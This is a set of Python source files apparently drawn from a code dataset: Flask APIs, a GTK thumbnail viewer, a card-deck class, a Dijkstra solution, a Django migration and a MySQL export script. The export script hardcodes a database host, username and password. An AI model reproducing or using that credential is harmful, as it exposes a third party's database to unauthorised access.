get_posts_by_user(uuid):\n user = User.query.filter_by(uuid=uuid).first()\n\n if user is None:\n abort(404, 'user with uuid %s not found' % uuid)\n\n results_per_page = 10\n # start on page 0 by default\n try:\n page = int(request.args.get('page', 0))\n except ValueError:\n abort(400, 'page was not a number')\n\n posts = user.posts[page * results_per_page: (page + 1) * results_per_page]\n response = {}\n for post in posts:\n # options = Option.query.filter_by(pid=post.pid).all()\n response[post.pid] = {\n 'q': post.question,\n 'lat': float(post.lat),\n 'lng': float(post.lng),\n 'author': uuid\n #'options': {option.oid: {'votes': option.votes, 'text': option.text} for option in options}\n }\n return jsonify(response)\n\n\n@app.route('/posts/@,', methods=['GET'])\ndef get_posts_by_location(lat, lng):\n # default radius if one is not specified\n radius = request.args.get('r', 5)\n\n try:\n # dummy Post object with location for use with filter\n curr = Post(\"\", float(lat), float(lng), User(\"\"))\n\n # default page 0\n page = int(request.args.get('page', 0))\n except ValueError:\n abort(400, 'please enter decimals for lat and long')\n\n results_per_page = 10\n\n posts = Post.query.filter(Post.distance(curr) < 5)[page * results_per_page: (page + 1) * results_per_page]\n response = {}\n for post in posts:\n # options = Option.query.filter_by(pid=post.pid).all()\n author = User.query.filter_by(uid=post.uid).first()\n response[post.pid] = {\n 'q': post.question,\n 'lat': float(post.lat),\n 'lng': float(post.lng),\n 'author': author.uuid\n #'options': {option.oid: {'votes': option.votes, 'text': option.text} for option in options}\n }\n return jsonify(response)\n\n\n@app.route('/posts', methods=['POST'])\ndef create_post():\n required_args = ['q', 'lat', 'lng', 'uuid', 'options']\n passed_params = {}\n response = {}\n\n # get all arguments from post\n for key in required_args:\n passed_params[key] = request.form.get(key, None)\n\n if any(passed_params[key] is None for key in required_args):\n # not all parameters were passed\n abort(400, 'missing parameter')\n\n try:\n options = ast.literal_eval(passed_params['options'])\n except SyntaxError:\n abort(400, 'error parsing options')\n\n user = User.query.filter_by(uuid=passed_params['uuid']).first()\n\n if user is None:\n abort(404, 'could not find user with uuid %s' % uuid)\n\n post = Post(passed_params['q'], passed_params['lat'], passed_params['lng'], user)\n\n db.session.add(post)\n db.session.flush()\n\n for option in options:\n db.session.add(Option(option, post.pid))\n\n db.session.commit()\n response['message'] = 'post created'\n return jsonify(response)\n\n\n@app.route('/posts', methods=['DELETE'])\ndef delete_post():\n # TODO: implementation\n pid = request.form.get('pid')\n post = Post.query.filter_by(pid=pid).first()\n if post is None:\n abort(404, 'post with pid %s not found' % pid)\n\n db.session.delete(post)\n db.session.commit()\n return jsonify({'message': 'post deleted'})\n\n\n@app.route('/posts//options', methods=['GET'])\ndef get_votes(pid):\n post = Post.query.filter_by(pid=pid).first()\n if post is None:\n abort(404, 'post with pid %s not found' % pid)\n response = {option.oid: {'text': option.text, 'votes': option.votes} for option in post.options}\n return jsonify(response)\n\n\n@app.route('/posts//votes/users/', methods=['GET'])\ndef get_votes_from_user(pid, uuid):\n vote = Vote.query.filter_by(pid=pid, uuid=uuid).first()\n response = {}\n if vote is None:\n response['voted'] = False\n else:\n response['voted'] = True\n response['oid'] = vote.oid\n return jsonify(response)\n\n\n@app.route('/options/', methods=['PATCH'])\ndef change_vote(oid):\n data = json.loads(request.data.decode('utf-8'))\n uuid = data.get('uuid')\n\n user = User.query.filter_by(uuid=uuid).first()\n if user is None:\n print(uuid)\n abort(404, 'user with uuid %s not found' % uuid)\n\n option = Option.query.filter_by(oid=oid).first()\n if option is None:\n abort(404, 'option with oid %s not found' % oid)\n\n operation = data.get('op')\n if operation is None:\n abort(400, 'no operation specified')\n\n if operation == 'add':\n vote = Vote(uuid, option.pid, oid)\n db.session.add(vote)\n option.votes += 1\n elif operation == 'remove':\n vote = Vote.query.filter_by(uuid=uuid, pid=option.pid).first()\n db.session.delete(vote)\n option.votes -= 1\n else:\n abort(400, 'not valid operation')\n\n db.session.commit()\n response = {'message': 'voted'}\n return jsonify(response)\n\n\n@app.route('/test/')\ndef test():\n print(request.args.get('q'))\n return 'test'\n","sub_path":"server/server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"79976214","text":"import Base_Equipment\n\nclass Clothing(Base_Equipment.Base_equipment):\n def add_new(self,item):\n if type(item) == Garment and not(item.isempty()):\n super().add_new(item)\n else:\n raise ValueError('expected Garment object, instead got ' + str(type(item)))\n\n def __eq__(self,tocompare):\n if type(tocompare) == Clothing and not(tocompare.isempty()):\n return super().__eq__(tocompare)\n else:\n raise ValueError('expected Clothing object, instead got ' + str(type(tocompare)))\n\nclass Garment(Base_Equipment.Equip):\n\n def __eq__(self,tocompare):\n if type(tocompare) == Garment and not(tocompare.isempty()):\n return super().__eq__(tocompare)\n else:\n raise ValueError('expected Garment object, instead got ' + str(type(tocompare)))\n","sub_path":"OA Objects/Clothing.py","file_name":"Clothing.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"484925850","text":"import os\nos.environ['CUDA_VISIBLE_DEVICES']='0'\n\nimport flask\n\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import send_file\n\nfrom flask_cors import CORS\n\nfrom database import db_session\nfrom models import Job, Visualization, VisualizationResult, STATUS_MAP\n\nfrom lucid.modelzoo import vision_models\n\nimport lucid.modelzoo.vision_models as models\nimport lucid.modelzoo.nets_factory as nets\n\nfrom lucid.modelzoo.nets_factory import get_model\n\nfrom network_utils import NETWORK_DESCRIPTION\n\n# from processor import ProcessorThread\n# import atexit\n\n\n# def close_running_threads():\n# print('joining threads')\n# processor_thread.stop()\n# processor_thread.join()\n\n# atexit.register(close_running_threads)\n\napp = Flask(__name__)\nCORS(app)\n\n\napi_version = 'v1'\n\n# processor_thread = ProcessorThread(db_session)\n# processor_thread.start()\n\nALLOWED_NETWORKS = []\nDATASETS = {}\n\nfor name, model in nets.models_map.items():\n# print name.ljust(27), \" \", Model.dataset\n ALLOWED_NETWORKS.append(name)\n DATASETS[name] = model.dataset\n\n# ALLOWED_NETWORKS = vision_models.__all__[-2:]\n\ndef get_allowed_layers(model_name, flat=False):\n\n# model = get_model(model_name)\n# model.load_graphdef()\n\n# # currently support only two layer types\n# allowed_layers = [node.name for node in model.graph_def.node if node.op in [\n# 'BiasAdd', 'Conv2D']]\n model_cls = getattr(models, model_name, None)\n \n if model_cls:\n if flat:\n allowed_layers = [layer.name for layer in model_cls.layers]\n else:\n allowed_layers = {layer.name:{'type':list(layer.tags)[0], 'depth':layer.depth} for layer in model_cls.layers}\n \n \n else:\n allowed_layers = []\n \n return allowed_layers\n\n# ALLOWED_LAYERS = get_allowed_layers(MODEL_NAMES)\n\ndef wrap_reply(data, success=True, data_key='data'):\n return jsonify({data_key:data, 'success':success})\n\n@app.route('/', methods=['GET'])\ndef api_info():\n return jsonify({'version': api_version})\n\n\n@app.route(f'/{api_version}/networks/', methods=['GET'])\ndef available_networks():\n '''\n Return a list of available networks\n '''\n \n reply = []\n \n for i, net in enumerate(ALLOWED_NETWORKS):\n reply.append({'id':i, 'description':NETWORK_DESCRIPTION.get(net, 'no description'), 'name':net, 'dataset':DATASETS.get(net, 'unknown')})\n \n return wrap_reply(reply, data_key='networks')\n\n\n@app.route(f'/{api_version}/networks/', methods=['GET'])\ndef network_def(network):\n if network in ALLOWED_NETWORKS:\n return wrap_reply(get_allowed_layers(network))\n else:\n return wrap_reply(f'model {network} not found', False)\n\ndef to_url(img_name):\n im_name = img_name.split('/')[-1]\n return f'/img/{im_name}'\n\n@app.route(f'/{api_version}/visualizations/', methods=['GET'])\ndef vis_all():\n\n vis = []\n for v in Visualization.query.all():\n d = v._asdict()\n\n res = []\n\n for r in v.results:\n dr = r._asdict()\n dr['img_url'] = to_url(dr['img_name'])\n del dr['img_name']\n\n res.append(dr)\n\n d['results'] = res\n\n vis.append(d)\n\n return wrap_reply(vis)\n\n@app.route(f'/{api_version}/visualizations/', methods=['GET'])\ndef vis_details(vis_id):\n return jsonify({'data': [vis_id]})\n\n\ndef validate_params(params, required_keys=['network', 'layer']):\n for key in required_keys:\n if not key in params:\n return False\n\n return True\n\ndef job_to_dict(j):\n d = {\n 'id': j.id,\n 'status': STATUS_MAP[j.status],\n 'network': j.network,\n 'layer': j.layer,\n 'channel': j.channel,\n 'submitted': j.submitted\n }\n\n return d\n\n@app.route(f'/{api_version}/jobs/', methods=['GET', 'POST'])\ndef jobs_all():\n if flask.request.method == 'POST':\n \n params = flask.request.get_json()\n\n if not validate_params(params):\n return wrap_reply('bad params', False)\n\n net = params['network']\n\n if net not in ALLOWED_NETWORKS:\n return wrap_reply(f'{net} is not allowed', False)\n\n layer = params['layer']\n \n allowed_layers = get_allowed_layers(net) \n \n \n if layer not in allowed_layers:\n return wrap_reply(f'{layer} is not allowed', False)\n\n if 'channel' in params:\n channel = int(params['channel'])\n \n max_depth = allowed_layers[layer]['depth']\n \n if channel >= max_depth:\n return wrap_reply(f'max depth for {layer} is {max_depth} (submitted {channel})', False)\n else:\n # db expects channel to be a string\n channel = str(channel)\n \n else:\n channel = ''\n\n j = Job(network=params['network'], layer=layer, channel=channel)\n db_session.add(j)\n db_session.commit()\n\n return wrap_reply('')\n else:\n jobs = []\n for j in Job.query.all():\n d = j._asdict()\n jobs.append(d)\n\n return wrap_reply(jobs)\n\n@app.route('/img/')\ndef get_image(img_name):\n filename = f'./imgs_generated/{img_name}'\n return send_file(filename, mimetype='image/jpg')\n\n\n@app.route(f'/{api_version}/jobs/', methods=['GET'])\ndef jobs_detail(job_id):\n job = Job.query.filter(Job.id==job_id).first()\n if not job:\n return wrap_reply(f'{job_id} not found', False)\n else:\n d = j._asdict()\n # there must be a visualization associated object\n # if j.status == 2:\n # d['visualization'] = j.visualization._asdict()\n\n return wrap_reply(d)\n\ndef run_consumer(thread):\n # db_session, Job, Visualization, VisualizationResult\n pass\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\nif __name__ == \"__main__\":\n print('running')\n app.run(debug=False, port=5001, host='0.0.0.0') # run app in debug mode on port 5001\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"591773493","text":"# N개의 도시가 있다.\n# 1개 도시에서 출발하여 다른 도시에 도착하는 M개의 버스가 있다.\n# A번째 도시에서 B번째 도시까지 가는 버스 비용 최소화를 하려한다.\n# 도시의 번호는 1~N 까지이다.\n\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn = int(input())\nm = int(input())\n\ng = [[] for _ in range(n+1)]\nfor i in range(m):\n a, b, w = map(int, input().split())\n g[a].append((b, w))\n\nst, ed = map(int, input().split())\ndist = [INF] *(n+1)\n\ndef dijkstra(start):\n dist[start] = 0\n q = [(0, st)]\n\n while q:\n w, cur = heapq.heappop(q)\n if dist[cur] < w:\n continue\n for dest, wei in g[cur]:\n cost = dist[cur] + wei\n if dist[dest] > cost:\n dist[dest] = cost\n heapq.heappush(q, (cost, dest))\n\ndijkstra(st)\nprint(dist[ed])","sub_path":"약점체크/최소비용 구하기.py","file_name":"최소비용 구하기.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585333622","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\"\"\"Thumbnail part of vimiv.\"\"\"\n\nimport os\nfrom math import floor\n\nfrom gi.repository import GdkPixbuf, GLib, Gtk\n\nfrom vimiv.app_component import AppComponent\nfrom vimiv.fileactions import populate\nfrom vimiv.library import Library\nfrom vimiv.thumbnail_manager import ThumbnailManager\n\n\nclass Thumbnail(AppComponent):\n \"\"\"Thumbnail class for vimiv.\n\n Includes the iconview with the thumnbails and all actions that apply to it.\n\n Attributes:\n app: The main vimiv application to interact with.\n toggled: If True thumbnail mode is open.\n zoom_levels: List of tuples containing the possible thumbnail sizes.\n zoom_level_index: Position in the possible_sizes list.\n timer_id: ID of the currently running GLib.Timeout.\n creation failed.\n elements: List containing names of current thumbnail-files.\n markup: Markup string used to highlight search results.\n liststore: Gtk.ListStore containing thumbnail pixbufs and names.\n iconview: Gtk.IconView to display thumbnails.\n columns: Amount of columns that fit into the window.\n last_focused: Widget that was focused before thumbnail.\n \"\"\"\n\n def __init__(self, app, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n app: The main application class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n super().__init__(app)\n general = settings[\"GENERAL\"]\n\n # Settings\n self.toggled = False\n self.padding = general[\"thumb_padding\"]\n self.timer_id = GLib.Timeout\n self.elements = []\n self.markup = self.get_component(Library).markup.replace(\"fore\", \"back\")\n\n zoom_level = general[\"default_thumbsize\"]\n self.zoom_levels = [(64, 64), (128, 128), (256, 256), (512, 512)]\n self.zoom_level_index = self.zoom_levels.index(zoom_level)\n\n # Creates the Gtk elements necessary for thumbnail mode, fills them\n # and focuses the iconview\n # Create the liststore and iconview\n self.liststore = Gtk.ListStore(GdkPixbuf.Pixbuf, str)\n self.iconview = Gtk.IconView.new()\n self.iconview.connect(\"item-activated\", self.iconview_clicked)\n self.iconview.connect(\"key_press_event\", self.app[\"eventhandler\"].run,\n \"THUMBNAIL\")\n self.iconview.connect(\"button_press_event\",\n self.app[\"eventhandler\"].run, \"THUMBNAIL\")\n self.iconview.set_model(self.liststore)\n self.iconview.set_pixbuf_column(0)\n self.iconview.set_markup_column(1)\n\n self.columns = 0\n self.iconview.set_item_width(0)\n self.iconview.set_item_padding(self.padding)\n self.last_focused = \"\"\n self.thumbnail_manager = ThumbnailManager()\n\n def iconview_clicked(self, iconview, path):\n \"\"\"Select and show image when thumbnail was activated.\n\n Args:\n iconview: Gtk.IconView that emitted the signal.\n path: Gtk.TreePath of the activated thumbnail.\n \"\"\"\n self.toggle(True)\n count = path.get_indices()[0] + 1\n self.app[\"eventhandler\"].num_clear()\n self.app[\"eventhandler\"].num_str = str(count)\n self.app[\"image\"].move_pos()\n\n def toggle(self, select_image=False):\n \"\"\"Toggle thumbnail mode.\n\n Args:\n select_image: If True an image was selected. Never focus the library\n then.\n \"\"\"\n # Close\n if self.toggled:\n self.app[\"image\"].scrolled_win.remove(self.iconview)\n self.app[\"image\"].scrolled_win.add(self.app[\"image\"].viewport)\n if self.last_focused == \"im\" or select_image:\n self.app[\"image\"].scrolled_win.grab_focus()\n elif self.last_focused == \"lib\":\n self.app[\"library\"].focus()\n # Re-expand the library if there is no image and the setting\n # applies\n if self.app[\"library\"].expand and \\\n self.app[\"image\"].pixbuf_original.get_height() == 1:\n self.app[\"image\"].scrolled_win.hide()\n self.app[\"library\"].scrollable_treeview.set_hexpand(True)\n self.toggled = False\n # Open thumbnail mode differently depending on where we come from\n elif self.app.paths and self.app[\"image\"].scrolled_win.is_focus():\n self.last_focused = \"im\"\n self.show()\n elif self.app[\"library\"].files \\\n and self.app[\"library\"].treeview.is_focus():\n self.last_focused = \"lib\"\n self.app.paths, self.app.index = populate(self.app[\"library\"].files)\n if self.app.paths:\n self.app[\"library\"].scrollable_treeview.set_hexpand(False)\n self.app[\"image\"].scrolled_win.show()\n self.show()\n else:\n self.app[\"statusbar\"].message(\"No images in directory\", \"error\")\n return\n else:\n self.app[\"statusbar\"].message(\"No open image\", \"error\")\n return\n # Manipulate bar is useless in thumbnail mode\n if self.app[\"manipulate\"].scrolled_win.is_visible():\n self.app[\"manipulate\"].toggle()\n # Update info for the current mode\n self.app[\"statusbar\"].update_info()\n\n def calculate_columns(self):\n \"\"\"Calculate how many columns fit into the current window.\"\"\"\n width = self.app[\"window\"].winsize[0]\n if self.app[\"library\"].grid.is_visible():\n width -= self.app[\"library\"].width\n\n self.columns = floor(\n (width - 12) / (self.get_zoom_level()[0] + 2 * self.padding))\n if self.columns < 1:\n self.columns = 1\n free_space = (width - 12) % (\n self.get_zoom_level()[0] + 2 * self.padding)\n padding = floor(free_space / self.columns)\n self.iconview.set_column_spacing(padding)\n self.iconview.set_columns(self.columns)\n\n def show(self, toggled=False):\n \"\"\"Show thumbnails when called from toggle.\n\n Args:\n toggled: If True thumbnail mode is already toggled.\n \"\"\"\n # Clean liststore\n self.liststore.clear()\n\n # Draw the icon view instead of the image\n if not toggled:\n self.app[\"image\"].scrolled_win.remove(self.app[\"image\"].viewport)\n self.app[\"image\"].scrolled_win.add(self.iconview)\n # Show the window\n self.iconview.show()\n self.toggled = True\n\n # Add initial placeholder for all thumbnails\n default_pixbuf_max = GdkPixbuf.Pixbuf.new_from_file_at_scale(\n self.thumbnail_manager.default_icon,\n *self.get_zoom_level(), True)\n size = self.get_zoom_level()[0]\n default_pixbuf = self.thumbnail_manager.scale_pixbuf(default_pixbuf_max,\n size)\n for path in self.app.paths:\n name = self._get_name(path)\n self.liststore.append([default_pixbuf, name])\n\n # Generate thumbnails asynchronously\n self.reload_all(ignore_cache=True)\n\n # Set columns\n self.calculate_columns()\n\n # Focus the current image\n self.iconview.grab_focus()\n pos = self.app.index % len(self.app.paths)\n self.move_to_pos(pos)\n\n def reload_all(self, ignore_cache=False):\n size = self.get_zoom_level()[0]\n for i, path in enumerate(self.app.paths):\n self.thumbnail_manager.get_thumbnail_at_scale_async(\n path, size, self._on_thumbnail_created, i,\n ignore_cache=ignore_cache)\n\n def _on_thumbnail_created(self, pixbuf, position):\n # Subsctipting the liststore directly works fine\n # pylint: disable=unsubscriptable-object\n self.liststore[position][0] = pixbuf\n self.move_to_pos(self.app.get_pos(force_widget=\"thu\"))\n\n def _get_name(self, filename):\n name = os.path.splitext(os.path.basename(filename))[0]\n if filename in self.app[\"mark\"].marked:\n name += \" [*]\"\n\n return name\n\n def reload(self, filename, reload_image=True):\n \"\"\"Reload the thumbnails of manipulated images.\n\n Args:\n filename: Name of the file to reload thumbnail of.\n reload_image: If True reload the image of the thumbnail. Else only\n the name (useful for marking).\n \"\"\"\n index = self.app.paths.index(filename)\n name = self._get_name(filename)\n if index in self.app[\"commandline\"].search_positions:\n name = self.markup + \"\" + name + \"\"\n\n # pylint: disable=unsubscriptable-object\n if reload_image:\n self.thumbnail_manager.get_thumbnail_at_scale_async(\n filename, self.get_zoom_level()[0],\n self._on_thumbnail_created, index, ignore_cache=True)\n\n self.liststore[index][1] = name\n\n def move_direction(self, direction):\n \"\"\"Scroll with \"hjkl\".\n\n Args:\n direction: Direction to scroll in. One of \"hjkl\".\n \"\"\"\n # Start at current position\n new_pos = self.app.get_pos(force_widget=\"thu\")\n # Check for a user prefixed step\n step = self.app[\"eventhandler\"].num_receive()\n # Get variables used for calculation of limits\n last = len(self.app.paths)\n rows = self.iconview.get_item_row(Gtk.TreePath(last - 1))\n elem_last_row = last - rows * self.columns\n elem_per_row = floor((last - elem_last_row) / rows) if rows else last\n column = self.iconview.get_item_column(Gtk.TreePath(new_pos))\n row = self.iconview.get_item_row(Gtk.TreePath(new_pos))\n min_pos = 0\n max_pos = last - 1\n # Simple scrolls\n if direction == \"h\":\n new_pos -= step\n elif direction == \"k\":\n min_pos = column\n new_pos -= self.columns * step\n elif direction == \"l\":\n new_pos += step\n elif direction == \"j\":\n max_pos = (rows - 1) * elem_per_row + column \\\n if column >= elem_last_row else rows * elem_per_row + column\n new_pos += self.columns * step\n # First element in row\n elif direction == \"H\":\n new_pos = row * elem_per_row\n # Last element in column\n elif direction == \"J\":\n new_pos = (rows - 1) * elem_per_row + column \\\n if column >= elem_last_row else rows * elem_per_row + column\n # First element in column\n elif direction == \"K\":\n new_pos %= elem_per_row\n # Last element in row\n elif direction == \"L\":\n new_pos = (row + 1) * elem_per_row - 1\n # Do not scroll to paths that are over the limits\n if new_pos < min_pos:\n new_pos = min_pos\n elif new_pos > max_pos:\n new_pos = max_pos\n # Move\n self.move_to_pos(new_pos)\n\n def move_to_pos(self, pos):\n \"\"\"Set focus on position in iconview and center it.\n\n Args:\n pos: The position to focus.\n \"\"\"\n self.iconview.select_path(Gtk.TreePath(pos))\n cell_renderer = self.iconview.get_cells()[0]\n self.iconview.set_cursor(Gtk.TreePath(pos), cell_renderer, False)\n self.iconview.scroll_to_path(Gtk.TreePath(pos), True, 0.5, 0.5)\n # Clear the user prefixed step\n self.app[\"eventhandler\"].num_clear()\n\n def zoom(self, inc=True):\n \"\"\"Zoom thumbnails.\n\n Args:\n inc: If True increase thumbnail size.\n \"\"\"\n # What zoom and limits\n if inc and self.zoom_level_index < len(self.zoom_levels) - 1:\n self.zoom_level_index += 1\n elif not inc and self.zoom_level_index > 0:\n self.zoom_level_index -= 1\n else:\n return\n\n # Rescale all images in liststore\n if self.toggled:\n self.reload_all()\n\n # Set columns and refocus current image\n self.calculate_columns()\n self.move_to_pos(self.app.get_pos(force_widget=\"thu\"))\n\n def get_zoom_level(self):\n return self.zoom_levels[self.zoom_level_index]\n","sub_path":"vimiv/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"612070677","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2012 Majormode. All rights reserved.\r\n#\r\n# This software is the confidential and proprietary information of\r\n# Majormode or one of its subsidiaries. You shall not disclose this\r\n# confidential information and shall use it only in accordance with\r\n# the terms of the license agreement or other applicable agreement you\r\n# entered into with Majormode.\r\n#\r\n# MAJORMODE MAKES NO REPRESENTATIONS OR WARRANTIES ABOUT THE\r\n# SUITABILITY OF THE SOFTWARE, EITHER EXPRESS OR IMPLIED, INCLUDING\r\n# BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT. MAJORMODE\r\n# SHALL NOT BE LIABLE FOR ANY LOSSES OR DAMAGES SUFFERED BY LICENSEE\r\n# AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THIS SOFTWARE OR ITS\r\n# DERIVATIVES.\r\n#\r\n# @version $Revision$\r\n\r\nimport random\r\n\r\nclass AngloAmericanCard(object):\r\n \"\"\"\r\n Represent a card of the standard Anglo-American deck of 52 playing\r\n cards that includes thirteen ranks of each of the four French suits,\r\n spades, hearts, diamonds, and clubs.\r\n \"\"\"\r\n # Identification of each card rank.\r\n CARD_RANK_2 = 0\r\n CARD_RANK_3 = 1\r\n CARD_RANK_4 = 2\r\n CARD_RANK_5 = 3\r\n CARD_RANK_6 = 4\r\n CARD_RANK_7 = 5\r\n CARD_RANK_8 = 6\r\n CARD_RANK_9 = 7\r\n CARD_RANK_10 = 8\r\n CARD_RANK_JACK = 9\r\n CARD_RANK_QUEEN = 10\r\n CARD_RANK_KING = 11\r\n CARD_RANK_ACE = 12\r\n\r\n CARD_RANK_COUNT = 13\r\n\r\n # Identification of each card suit.\r\n CARD_SUIT_SPADES = 0\r\n CARD_SUIT_HEARTS = 1\r\n CARD_SUIT_DIAMONDS = 2\r\n CARD_SUIT_CLUBS = 3\r\n\r\n CARD_SUIT_COUNT = 4\r\n\r\n # Code names of Anglo-American card ranks.\r\n CARD_RANK_NAMES = {\r\n CARD_RANK_2: '2',\r\n CARD_RANK_3: '3',\r\n CARD_RANK_4: '4',\r\n CARD_RANK_5: '5',\r\n CARD_RANK_6: '6',\r\n CARD_RANK_7: '7',\r\n CARD_RANK_8: '8',\r\n CARD_RANK_9: '9',\r\n CARD_RANK_10: '10',\r\n CARD_RANK_JACK: 'J',\r\n CARD_RANK_QUEEN: 'Q',\r\n CARD_RANK_KING: 'K',\r\n CARD_RANK_ACE: 'A'\r\n }\r\n\r\n # Code names of Anglo-American card suits.\r\n CARD_SUIT_NAMES = {\r\n CARD_SUIT_SPADES: 'S',\r\n CARD_SUIT_HEARTS: 'H',\r\n CARD_SUIT_DIAMONDS: 'D',\r\n CARD_SUIT_CLUBS: 'C'\r\n }\r\n\r\n def __init__(self, rank, suit):\r\n assert (rank >= 0) and (rank < AngloAmericanCard.CARD_RANK_COUNT), 'Invalid card rank \"%d\"' % rank\r\n assert (suit >= 0) and (suit < AngloAmericanCard.CARD_SUIT_COUNT), 'Invalid card suit \"%d\"' % suit\r\n self.rank = rank\r\n self.suit = suit\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Return the “official” string representation of this card object. It\r\n looks like a valid Python expression that could be used to recreate an\r\n object with the same value using the static method ``from_string``.\r\n\r\n @return: a string representation of this card instance.\r\n \"\"\"\r\n return self.__str__()\r\n\r\n def __str__(self):\r\n \"\"\"\r\n Return a string representation of this card.\r\n\r\n @return: a string representation of this card composed of two\r\n characters. The first character corresponds to the rank of\r\n this card, while the second character corresponds to the suit\r\n of the card.\r\n \"\"\"\r\n return \"%s%s\" % (AngloAmericanCard.CARD_RANK_NAMES[self.rank],\r\n AngloAmericanCard.CARD_SUIT_NAMES[self.suit])\r\n\r\n @staticmethod\r\n def from_string(string):\r\n \"\"\"\r\n Return an instance ``AngloAmericanCard`` built from a card string\r\n representation passed to this function.\r\n\r\n @param string: a string representation of a card, composed of a pair\r\n of two letters, case not sensitive, corresponding, in that\r\n order, to the rank and to the suit of an Anglo-American card.\r\n\r\n @return: an instance ``AngloAmericanCard``.\r\n\r\n @raise AssertError: if the card string representation is not valid.\r\n \"\"\"\r\n assert len(string) == 2, 'Invalid card string representation \"%s\"' % string\r\n return AngloAmericanCard(AngloAmericanCard.CARD_RANK_NAMES.values().index(string[0]),\r\n AngloAmericanCard.CARD_SUIT_NAMES.values().index(string[1]))\r\n\r\n @staticmethod\r\n def shuffle_cards():\r\n \"\"\"\r\n Return a shuffled deck of 52 playing cards.\r\n\r\n @return: a shuffled deck of 52 playing cards.\r\n \"\"\"\r\n cards = [ AngloAmericanCard(rank, suit)\r\n for rank in range(len(AngloAmericanCard.CARD_RANK_NAMES))\r\n for suit in range(len(AngloAmericanCard.CARD_SUIT_NAMES)) ]\r\n\r\n random.seed()\r\n random.shuffle(cards)\r\n return cards\r\n","sub_path":"majormode/perseus/model/anglo_american_card.py","file_name":"anglo_american_card.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497085960","text":"#!/urs/bin/python\nimport dumper\nimport MySQLdb\nimport msgpack\n\ndef gene2pathway():\n conn = MySQLdb.connect(host='rdsikqm8sr3rugdu1muh3.mysql.rds.aliyuncs.com',user='gpo',passwd='btlc123',db='clinic')\n cursor = conn.cursor()\n sql1 = 'select * from gene2pathway'\n cursor.execute(sql1)\n results1 = cursor.fetchall()\n gene2paths = {}\n for result in results1:\n gene=result[0]\n paths=result[1]\n kegs = paths.lstrip('|').split('|')\n gene2paths[gene] = kegs\n return gene2paths\n\npaths = gene2pathway()\npacked = msgpack.packb(paths)\nfp = open(\"gene2paths.bson\",\"w\")\n\nfp.write(packed)\n\n \n","sub_path":"seq-service/anno2arrange/anno2sqlnums/gene2pathway.py","file_name":"gene2pathway.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"12808077","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filebrowser.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('event', '0002_auto_20150406_0231'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='photo',\n options={'ordering': ['photo_order'], 'verbose_name_plural': 'фотографии', 'verbose_name': 'фотографии'},\n ),\n migrations.RemoveField(\n model_name='event',\n name='announce_photo',\n ),\n migrations.RemoveField(\n model_name='event',\n name='title_after',\n ),\n migrations.RemoveField(\n model_name='event',\n name='title_before',\n ),\n migrations.AddField(\n model_name='event',\n name='button',\n field=models.PositiveSmallIntegerField(choices=[(1, 'посмотреть'), (2, 'подробнее'), (3, 'забронировать столик')], verbose_name='Кнопка', default=2),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='event',\n name='photo',\n field=filebrowser.fields.FileBrowseField(max_length=255, default='', verbose_name='Графический файл'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='event',\n name='title_small',\n field=models.CharField(blank=True, max_length=255, verbose_name='Титул (мелкий шрифт)', help_text='В титулах возможно вставлять
    '),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='event',\n name='edate',\n field=models.DateTimeField(verbose_name='Дата события', help_text='Поле сортировки'),\n preserve_default=True,\n ),\n ]\n","sub_path":"apps/event/migrations/0003_auto_20150422_0056.py","file_name":"0003_auto_20150422_0056.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"153082028","text":"# step3_train.py\n\"\"\"Use projected data to learn reduced-order models via Tikhonov-regularized\nOperator Inference with regularization hyperparameter selection.\n\nExamples\n--------\n## --single: train and save a single ROM for a given λ1, λ2.\n\n# Use 10,000 projected snapshots to learn a ROM of dimension r = 24\n# with regularization parameters λ1 = 400, λ2 = 21000.\n$ python3 step3_train.py --single 10000 24 400 21000\n\n## --gridsearch: train over a grid of candidates for λ1 and λ2, saving\n only the stable ROM with least training error.\n\n# Use 20,000 projected snapshots to learn a ROM of dimension r = 40 and save\n# the one with the regularization resulting in the least training error and\n# for which the integrated POD modes stay within 150% of the training data in\n# magnitude for 60,000 time steps. For the regularization parameters, test\n# each point in the 4x5 logarithmically-spaced grid [500,9000]x[8000,10000]\n$ python3 step3_train.py --gridsearch 10000 40 5e2 9e3 4 8e3 1e4 5\n --testsize 60000 --margin 1.5\n\n## --minimize: given initial guesses for λ1 and λ2, use Nelder-Mead search\n to train and save a ROM that is locally 